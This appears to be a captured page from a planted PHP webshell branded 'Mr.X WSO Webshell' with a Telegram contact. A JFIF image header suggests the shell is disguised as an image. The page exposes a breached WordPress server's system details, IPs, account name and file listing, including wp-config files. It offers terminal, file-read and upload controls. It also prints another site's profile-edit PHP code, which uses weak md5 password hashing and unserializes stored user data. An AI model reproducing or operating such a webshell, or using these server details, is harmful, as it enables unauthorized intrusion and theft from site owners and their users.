����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 00:19:03
1999.30 GB Free: 83.21 GB (4%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 00:15:42drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-08 17:17:21drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/baretube.com/controllers/
Upload Files
File: /home/httpd/html/baretube.com/controllers/control.edit_profile.php
<?php

    if (!$_SESSION['userid']) {
        header("Location: $basehttp/login");
        exit();
    }

    if ($_POST) {
        
        $_POST = array_map_array('trim', $_POST);
        $_POST = array_map_array('strip_tags', $_POST);
        
        if ($_POST['email'] == '') {
            setMessage(_t('E-mail is required!'), 'error');
        } else if (!filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
            setMessage(_t('Invalid Email Address'), 'error');
        } else if (is_array(dbQuery("SELECT `record_num` FROM `users` WHERE `email` = '" . mysqli_real_escape_string($dbconn, $_POST['email']) . "' AND `record_num` != '$_SESSION[userid]'", false))) {
            setMessage(_t('This e-mail is not available!'), 'error');
        }
        
        if ($_FILES['file']['tmp_name']) {
            if (filesize($_FILES['file']['tmp_name']) > $config['max_avatar_size'] * 1024) {
                setMessage(_t('Your avatar is too big. It can be a maximum of %sizekB in GIF, JPG, or PNG format.', array('%size' => $config['max_avatar_size'])), 'error');
            } else {
                $ext = explode(".", strtolower($_FILES['file']['name']));
                $ext = array_reverse($ext);
                if (!in_array($ext[0], array('jpg', 'jpeg', 'png'))) {
                    setMessage(_t('You may only upload image files.'), 'error');
                }
            }
        }

        if (!getMessages(false, 'error')) {
            
            dbUpdate('users', array(
                'email' => $_POST['email'],
                'location' => htmlentities($_POST['location']),
                'age' => (int)$_POST['age'],
                'gender' => htmlentities($_POST['gender']),
                'description' => htmlentities($_POST['description']),
                'custom' => serialize($_POST['custom']),
                'session_reload' => 1,
                'record_num' => $_SESSION['userid'],
            ));
            
            dbUpdate('users_notifications', array(
                'new_message' => (int) $_POST['notifications']['new_message'],
                'new_comment' => (int) $_POST['notifications']['new_comment'],
                'new_post' => (int) $_POST['notifications']['new_post'],
                'friend_request' => (int) $_POST['notifications']['friend_request'],
                'user_id' => $_SESSION['userid'],
            ), 'user_id');

            if ($_POST['newpassword'] != '') {
                $getSalt = dbValue("SELECT `salt` FROM `users` WHERE `record_num` = '" . $_SESSION['userid'] . "'", 'salt');
                $newpass = mysqli_real_escape_string($dbconn, md5($_POST['newpassword'] . $getSalt));
                dbQuery("UPDATE `users` SET `password` = '$newpass', `session_reload` = 1 WHERE `record_num` = '" . $_SESSION['userid'] . "'", false);
            }
            
            if ($_FILES['file']['tmp_name']) {
                $ext = explode(".", strtolower($_FILES['file']['name']));
                $ext = array_reverse($ext);
                $filename = uniqid() . '.' . $ext[0];
                $target = "$misc_path/$filename";
                $target_big = "$misc_path/big-$filename";
                move_uploaded_file($_FILES['file']['tmp_name'], $target_big);
                makeImageThumbnail($target_big, $target, 800, 600, 'mogrify');
                makeImageThumbnail($target_big, $target, 170, 130);
                dbQuery("UPDATE `users` SET `avatar` = '$filename' WHERE `record_num` = '" . $_SESSION['userid'] . "'", false);
                setCache("getUserAvatar.$_SESSION[userid]", ' ', -1);
            }
            setMessage(_t('Your information has been updated.'), 'success');
            header("Location: $_SERVER[REQUEST_URI]");
            exit();
        }
    }

    $userRes = dbQuery("SELECT * FROM users WHERE record_num = '" . $_SESSION['userid'] . "'", false);
    $urow = $userRes[0];

    $getNotif = dbQuery("SELECT new_message,new_post,new_comment,friend_request FROM users_notifications WHERE user_id = {$_SESSION['userid']}", false);
    foreach ($getNotif[0] as $note => $value) {
        $urow['notifications'][$note] = $value;
    }

    $custom = unserialize($urow['custom']);
?>
@ Telegram